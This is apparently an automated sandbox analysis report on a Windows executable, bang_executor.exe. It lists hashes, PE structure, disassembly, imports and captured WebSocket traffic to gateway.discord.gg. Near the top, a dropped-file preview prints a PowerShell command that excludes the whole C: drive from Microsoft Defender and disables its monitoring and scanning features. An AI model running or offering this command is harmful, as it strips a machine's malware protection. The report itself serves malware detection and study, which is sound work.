                                      SSDEEP:48:nxlrBUdUg7UiUKUKJUtUvQUkUyUz7U5FUCFUUiFxw8oi8v8U8bFbKbFOSFSk3SWa:miqdoTExbFWbFDEnWR43jGqR
                                      MD5:3499745C76F31429C42A3B34D8CC0AF6
                                      SHA1:F9125070406CC2A2A6CF092F3ED3D36751107224
                                      SHA-256:3C2EB503E7D32F48B06199E6C1C350E559C316FD9F6F17F040E41079F44FB6E3
                                      SHA-512:1757EE5F42A8681E84CE3070D7EE164107EBC284BC0EB5424A4E71FE71E122EEADB28D63535D88557C0C49C687CE4514E8D387781EC7C68E1171994183DDE1FB
                                      Malicious:false
                                      Preview:Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction Silently
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):5.876879950601886
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:bang_executor.exe
                                      File size:678'979 bytes
                                      MD5:043e699dbf3d88b6cca5fbe64229ba27
                                      SHA1:50661d32315985eab2a70f1d1f6435b9563ca237
                                      SHA256:2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747
                                      SHA512:04f23cfa08684ce109685bf2068211731018a85bb588cff9de67faca8ecc6e3e02b150a656f91b55557e5f4a949400f90da19f8c37f5abfac034e68e4cc633c2
                                      SSDEEP:6144:3E+yclwQKjdn+WPtYVJIoBf4xX26I6DqJM1tc2uQNQ5rHbIOohWy0f:3BdlwHRn+WlYV+Rp2yEM1tc2uYXOos
                                      TLSH:FCE47D02BAC3D075EF21157887E0C699DA79BE944E35C6868FF0BC6CDA33AC65E30585
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W...6...6...6....V..6....T.'6....U..6..)MZ..6..)M...6..)M...6..)M...6...N$..6...N4..6...6...7..'M...6..'M...6..'MX..6..'M...6.
                                      Icon Hash:0f0b1bb29a130f0e
                                      Entrypoint:0x421d50
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x651BC7F7 [Tue Oct 3 07:51:19 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:75e9596d74d063246ba6f3ac7c5369a0
                                      Instruction
                                      call 00007F114589E82Bh
                                      jmp 00007F114589E1DDh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push 00424F20h
                                      push dword ptr fs:[00000000h]
                                      mov eax, dword ptr [esp+10h]
                                      mov dword ptr [esp+10h], ebp
                                      lea ebp, dword ptr [esp+10h]
                                      sub esp, eax
                                      push ebx
                                      push esi
                                      push edi
                                      mov eax, dword ptr [0044277Ch]
                                      xor dword ptr [ebp-04h], eax
                                      xor eax, ebp
                                      push eax
                                      mov dword ptr [ebp-18h], esp
                                      push dword ptr [ebp-08h]
                                      mov eax, dword ptr [ebp-04h]
                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                      mov dword ptr [ebp-08h], eax
                                      lea eax, dword ptr [ebp-10h]
                                      mov dword ptr fs:[00000000h], eax
                                      ret
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      mov ecx, dword ptr [ebp-10h]
                                      mov dword ptr fs:[00000000h], ecx
                                      pop ecx
                                      pop edi
                                      pop edi
                                      pop esi
                                      pop ebx
                                      mov esp, ebp
                                      pop ebp
                                      push ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F1145890901h
                                      push 0043F388h
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F11458A0D55h
                                      int3
                                      jmp 00007F11458A2C28h
                                      push ebp
                                      mov ebp, esp
                                      and dword ptr [00466078h], 00000000h
                                      sub esp, 24h
                                      or dword ptr [004427B0h], 01h
                                      push 0000000Ah
                                      call dword ptr [004361D0h]
                                      test eax, eax
                                      je 00007F114589E512h
                                      and dword ptr [ebp-10h], 00000000h
                                      xor eax, eax
                                      push ebx
                                      push esi
                                      push edi
                                      xor ecx, ecx
                                      lea edi, dword ptr [ebp-24h]
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x405c0 | 0x34 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x405f4 | 0x50 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x68000 | 0x4698c | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xaf000 | 0x255c | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3e3b0 | 0x54 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x388b0 | 0x40 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x36000 | 0x278 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3fa9c | 0x120 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0x345cc | 0x34600 | b7a8b04ab2248443b05e8133fb3a9064 | False | 0.5887343377088305 | data | 6.708390817791953 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata | 0x36000 | 0xb410 | 0xb600 | a418919d63b67e937555eec95d3b6bcb | False | 0.45409083104395603 | Applesoft BASIC program data, first line number 4 | 5.215945456388312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data | 0x42000 | 0x24758 | 0x1200 | d8d5c95192b51ddad1857caa38e7daa9 | False | 0.4049479166666667 | data | 4.078919796039023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didat | 0x67000 | 0x1a4 | 0x200 | ee74a17c4eeb586c9811481b77498b43 | False | 0.4609375 | data | 3.5194570553957747 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc | 0x68000 | 0x4698c | 0x46a00 | 63c467fae2a86ee53a2cedff6cddbf84 | False | 0.1831339878318584 | data | 2.8883832145704766 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0xaf000 | 0x255c | 0x2600 | 699c6b2b1b2acad2d0f219d9328713af | False | 0.783203125 | data | 6.6660836278877325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      PNG | 0x68524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                      PNG | 0x6906c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                      RT_ICON | 0x6a618 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 | | | 0.15086028345711158
                                      RT_DIALOG | 0xac640 | 0x286 | data | English | United States | 0.5092879256965944
                                      RT_DIALOG | 0xac8c8 | 0x13a | data | English | United States | 0.60828025477707
                                      RT_DIALOG | 0xaca04 | 0xec | data | English | United States | 0.6991525423728814
                                      RT_DIALOG | 0xacaf0 | 0x12e | data | English | United States | 0.5927152317880795
                                      RT_DIALOG | 0xacc20 | 0x338 | data | English | United States | 0.45145631067961167
                                      RT_DIALOG | 0xacf58 | 0x252 | data | English | United States | 0.5757575757575758
                                      RT_STRING | 0xad1ac | 0x1e2 | data | English | United States | 0.3900414937759336
                                      RT_STRING | 0xad390 | 0x1cc | data | English | United States | 0.4282608695652174
                                      RT_STRING | 0xad55c | 0x1b8 | data | English | United States | 0.45681818181818185
                                      RT_STRING | 0xad714 | 0x146 | data | English | United States | 0.5153374233128835
                                      RT_STRING | 0xad85c | 0x46c | data | English | United States | 0.3454063604240283
                                      RT_STRING | 0xadcc8 | 0x166 | data | English | United States | 0.49162011173184356
                                      RT_STRING | 0xade30 | 0x152 | data | English | United States | 0.5059171597633136
                                      RT_STRING | 0xadf84 | 0x10a | data | English | United States | 0.49624060150375937
                                      RT_STRING | 0xae090 | 0xbc | data | English | United States | 0.6329787234042553
                                      RT_STRING | 0xae14c | 0xd6 | data | English | United States | 0.5747663551401869
                                      RT_GROUP_ICON | 0xae224 | 0x14 | data | | | 1.1
                                      RT_MANIFEST | 0xae238 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39786666666666665
                                      DLL | Import
                                      KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                      OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
                                      gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                      Language of compilation system | Country where language is spoken | Map
                                      English | United States |
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Feb 15, 2024 18:14:52.269220114 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.269311905 CET | 443 | 49729 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.269403934 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.311702013 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.311785936 CET | 443 | 49729 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.512159109 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.512238026 CET | 443 | 49730 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.512321949 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.513292074 CET | 443 | 49729 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.513676882 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.521985054 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.522016048 CET | 443 | 49729 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.522461891 CET | 443 | 49729 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.524766922 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.524782896 CET | 443 | 49730 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.575810909 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.620212078 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.665906906 CET | 443 | 49729 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.710494995 CET | 443 | 49730 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.710859060 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.737051010 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.737077951 CET | 443 | 49730 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.737411022 CET | 443 | 49730 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.754947901 CET | 443 | 49729 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.755100012 CET | 443 | 49729 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:52.755363941 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.764010906 CET | 49729 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.778908968 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.901117086 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:52.941909075 CET | 443 | 49730 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:53.030802965 CET | 443 | 49730 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:53.030909061 CET | 443 | 49730 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:14:53.031193972 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:14:53.036541939 CET | 49730 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.303929090 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.304012060 CET | 443 | 49739 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:00.304301023 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.316705942 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.316783905 CET | 443 | 49739 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:00.501857996 CET | 443 | 49739 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:00.501935005 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.506978989 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.507004023 CET | 443 | 49739 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:00.507198095 CET | 443 | 49739 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:00.560302019 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.621280909 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.662003994 CET | 443 | 49739 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:00.759553909 CET | 443 | 49739 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:00.759608984 CET | 443 | 49739 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:00.759776115 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:00.762785912 CET | 49739 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:08.797833920 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:08.797935963 CET | 443 | 49751 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:08.798019886 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:08.807660103 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:08.807701111 CET | 443 | 49751 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:08.995923042 CET | 443 | 49751 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:08.996093988 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:08.998661995 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:08.998687983 CET | 443 | 49751 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:08.999118090 CET | 443 | 49751 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:09.044646978 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:09.075042963 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:09.117942095 CET | 443 | 49751 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:09.257384062 CET | 443 | 49751 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:09.257559061 CET | 443 | 49751 | 162.159.136.234 | 192.168.2.4
                                      Feb 15, 2024 18:15:09.257616997 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Feb 15, 2024 18:15:09.260412931 CET | 49751 | 443 | 192.168.2.4 | 162.159.136.234
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Feb 15, 2024 18:14:52.119832993 CET | 57935 | 53 | 192.168.2.4 | 1.1.1.1
                                      Feb 15, 2024 18:14:52.208641052 CET | 53 | 57935 | 1.1.1.1 | 192.168.2.4
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Feb 15, 2024 18:14:52.119832993 CET | 192.168.2.4 | 1.1.1.1 | 0x5381 | Standard query (0) | gateway.discord.gg | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Feb 15, 2024 18:14:52.208641052 CET | 1.1.1.1 | 192.168.2.4 | 0x5381 | No error (0) | gateway.discord.gg | | 162.159.136.234 | A (IP address) | IN (0x0001) | false
                                      Feb 15, 2024 18:14:52.208641052 CET | 1.1.1.1 | 192.168.2.4 | 0x5381 | No error (0) | gateway.discord.gg | | 162.159.133.234 | A (IP address) | IN (0x0001) | false
                                      Feb 15, 2024 18:14:52.208641052 CET | 1.1.1.1 | 192.168.2.4 | 0x5381 | No error (0) | gateway.discord.gg | | 162.159.130.234 | A (IP address) | IN (0x0001) | false
                                      Feb 15, 2024 18:14:52.208641052 CET | 1.1.1.1 | 192.168.2.4 | 0x5381 | No error (0) | gateway.discord.gg | | 162.159.134.234 | A (IP address) | IN (0x0001) | false
                                      Feb 15, 2024 18:14:52.208641052 CET | 1.1.1.1 | 192.168.2.4 | 0x5381 | No error (0) | gateway.discord.gg | | 162.159.135.234 | A (IP address) | IN (0x0001) | false
                                      • gateway.discord.gg
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.4 | 49729 | 162.159.136.234 | 443 | 1236 | C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-02-15 17:14:52 UTC | 187 | OUT | GET /?v=9&encording=json HTTP/1.1
                                      Connection: Upgrade,Keep-Alive
                                      Upgrade: websocket
                                      Sec-WebSocket-Key: JZZV0wLYGWIArUk7blYl6g==
                                      Sec-WebSocket-Version: 13
                                      Host: gateway.discord.gg
                                      2024-02-15 17:14:52 UTC | 618 | IN | HTTP/1.1 404 Not Found
                                      Date: Thu, 15 Feb 2024 17:14:52 GMT
                                      Content-Length: 0
                                      Connection: close
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gf5S58277ctmcHDr2F3eKBmVHGRh%2BLXS1%2BE5PO504UiM7awvLASVT61pRN89tvvA5abcG1wv0UC2IymOWJ%2Bs5aFnRfJSS8JJgWD9pfhMdb5wyrGMDcBVUmm%2BnjEwsW%2FStr3G9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-Content-Type-Options: nosniff
                                      Server: cloudflare
                                      CF-RAY: 855f308f3b314315-EWR


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.4 | 49730 | 162.159.136.234 | 443 | 7572 | C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-02-15 17:14:52 UTC | 187 | OUT | GET /?v=9&encording=json HTTP/1.1
                                      Connection: Upgrade,Keep-Alive
                                      Upgrade: websocket
                                      Sec-WebSocket-Key: aYUnNI1T2trVUmXeoUmoSw==
                                      Sec-WebSocket-Version: 13
                                      Host: gateway.discord.gg
                                      2024-02-15 17:14:53 UTC | 620 | IN | HTTP/1.1 404 Not Found
                                      Date: Thu, 15 Feb 2024 17:14:52 GMT
                                      Content-Length: 0
                                      Connection: close
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjEZVX6W2%2F7LeJAGd%2FLHKuQUR7qHPoRvppXrG4MiNbinv7vxjGwJjmW5N93qHkPsRtrsZ%2BbGo3xHovXoVizw0bo37XaVi2MVt7B4UBcb%2FQN%2BT0Yf4o9W7%2FRpalWvyPnalAKP8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-Content-Type-Options: nosniff
                                      Server: cloudflare
                                      CF-RAY: 855f3090ecdc43b6-EWR


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.4 | 49739 | 162.159.136.234 | 443 | 7356 | C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-02-15 17:15:00 UTC | 187 | OUT | GET /?v=9&encording=json HTTP/1.1
                                      Connection: Upgrade,Keep-Alive
                                      Upgrade: websocket
                                      Sec-WebSocket-Key: +ZQ8YwwGC+gtFcLWIAD8fQ==
                                      Sec-WebSocket-Version: 13
                                      Host: gateway.discord.gg
                                      2024-02-15 17:15:00 UTC | 612 | IN | HTTP/1.1 404 Not Found
                                      Date: Thu, 15 Feb 2024 17:15:00 GMT
                                      Content-Length: 0
                                      Connection: close
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DlNrVeh4%2FAHe4zGlXnfoRcTO0xUuNb1iwAP4JwQtjPUG0Nebl9oSCwBIWYcUWzOiPbKcfFg7M%2BqvkwDJULOKzJik0GCZUeEJRvlLa4D040Q14yzfKjcUUSZ95DPJnu4F0ghAzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-Content-Type-Options: nosniff
                                      Server: cloudflare
                                      CF-RAY: 855f30c13afb8c9c-EWR


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.4 | 49751 | 162.159.136.234 | 443 | 7968 | C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-02-15 17:15:09 UTC | 187 | OUT | GET /?v=9&encording=json HTTP/1.1
                                      Connection: Upgrade,Keep-Alive
                                      Upgrade: websocket
                                      Sec-WebSocket-Key: Du49Via+t800c0yCUOPmaQ==
                                      Sec-WebSocket-Version: 13
                                      Host: gateway.discord.gg
                                      2024-02-15 17:15:09 UTC | 612 | IN | HTTP/1.1 404 Not Found
                                      Date: Thu, 15 Feb 2024 17:15:09 GMT
                                      Content-Length: 0
                                      Connection: close
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VDjwJ6%2FAcpprXBh%2BLBImLVkoqsgddK96zslF6O1jFcimiwsKpVeEE8TqaM4KEo0SbP1wju1oGZwq8BYrx2mz8p6RTmpdNFzmFz7dtPpEa9KImtjalUpvIpBIF9s2vXERSFp0wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      X-Content-Type-Options: nosniff
                                      Server: cloudflare
                                      CF-RAY: 855f30f648580f7f-EWR



                                      Target ID:0
                                      Start time:18:14:48
                                      Start date:15/02/2024
                                      Path:C:\Users\user\Desktop\bang_executor.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\bang_executor.exe
                                      Imagebase:0x4e0000
                                      File size:678'979 bytes
                                      MD5 hash:043E699DBF3D88B6CCA5FBE64229BA27
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:18:14:49
                                      Start date:15/02/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
